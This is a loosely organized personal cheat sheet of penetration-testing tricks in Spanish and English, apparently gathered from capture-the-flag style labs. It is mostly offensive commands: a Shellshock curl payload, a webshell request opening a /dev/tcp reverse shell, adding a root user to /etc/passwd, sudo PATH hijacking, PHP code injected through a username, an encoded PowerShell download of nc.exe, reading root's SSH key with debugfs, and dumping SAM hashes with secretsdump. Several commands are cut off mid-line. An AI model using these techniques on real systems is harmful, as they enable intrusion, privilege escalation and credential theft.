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stderr y stdout

a veces los comandos por ejemplo en shellshock salen por stderr asi que tenemos que redireccionar stdout a stderr ex:

root@kali:~# curl -H "User-Agent: () { :; }; /bin/bash -c 'echo aaaa; nc  -h 2>&1; echo zzzz;'" -s \

unzip with python

#!/usr/bin/env python3
import sys
from zipfile import PyZipFile
for zip_file in sys.argv[1:]:
    pzf = PyZipFile(zip_file)

urlencode webshell request with curl

curl -X POST --data-urlencode ​ 'exec=bash -c "bash -i >& /dev/tcp/ 0>&1"'

run bash commands from powershell (wut)

PS C:\windows> bash -c "command"


bajar archivos con tipo binario porque los rompe sino

ftp> type binary
ftp> get backup.mdb

powershell hidden files

dir -Force

data stream

dir /R
​powershell Get-Content -Path "hm.txt" -Stream "root.txt"
more < hm.txt:root.txt


rdesktop -g 85% -r disk:share=/var/www -r clipboard:CLIPBOARD -u username -p password

if can run as sudo but dont have shell

echo 'toor:aaKNIEDOaueR6:0:0:toor:/root:/bin/bash' >> /etc/passwd

It will create a new root user with the password “foo”. The encrypted password was generated with: perl -le ‘print crypt(“foo”, “aa”)’. You can then easily elevate to a root shell with su toor.

localgroup Administrators offsec /add

this only work for old windows in modern execute a reverse shell might be the best idea

clean carriage return from scripts

sed -i -e ‘s/\r$//’ <script name>

steghide steganofrafia

usalo para sacar por ejemplo ssh que esten en una imagen

steghide extract -sf archivo.png

pading oracle attack


si no tiene full path en sudo -l podemos hijackearlo cambiando el path

Because a full path to the cat binary is not specified, this specific command is vulnerable to hijacking by modifying the ​ PATH​ system variable. This can be achieved by setting the working directory as the first option in PATH, with the command ​ export PATH=.:$PATH After this, creating a file named ​ cat​ in the working directory will cause the file to be executed by the root user. In this case, a bash script will do the trick. Note, do not use the ​ cat​ command in the script as this will cause the script to loop endlessly. Don’t forget to ​ chmod +x ./cat​ before running the backup binary. The script below creates a copy of the root flag in the home directory.

IPV6 ?

unix wildcards


windows php cookies

PHP stores the session files in C:\Windows\TEMP in the format sess_ . In order to read our session file we will use the session ID we acquired. In this case the session file would be sess_923nktm0vmmi12qrptls332t5o . Let's see if we can read it Replace everything after sess_ with your own cookie value.

curl -X GET

f we can create a username containing PHP code, we could potentially gain RCE. Consider the following as a username.

<?=`powershell whoami`?>

bypass blacklisting chars

echo "wget -o C:\\Windows\\TEMP\\nc.exe" | iconv -t
UTF-16LE | base64
<?=`powershell /enc


express using jwt token


if you own the directory but not the file, you can move it and create another one with the same name

disk permision

if you have disk permission you can use

debugfs /dev/sda1
debugfs: cat /root/.ssh/id_rsa

powershell thruogh ftp when restricted

 echo !powershell.exe > ftpcommands.txt && ftp -s:ftpcommands.txt

weird dependencies location

for example : As gcc is not available on the target machine, the exploit must be compiled locally. LinEnum previously identified ​ /home/decoder/test​ as world-writable and can be used to drop the binary. Attempting to run the exploit without modification will fail as the target is missing ​ /etc/lsb-release​ . Simply changing references of ​ /etc/lsb-release​ to ​ /home/decoder/test/lsb-release​ is sufficient.


reg save hklm\sam c:\sam reg save hklm\system c:\system python /usr/share/doc/python-impacket/examples/secretsdump.py -sam SAM -security SECURITY -system SYSTEM LOCAL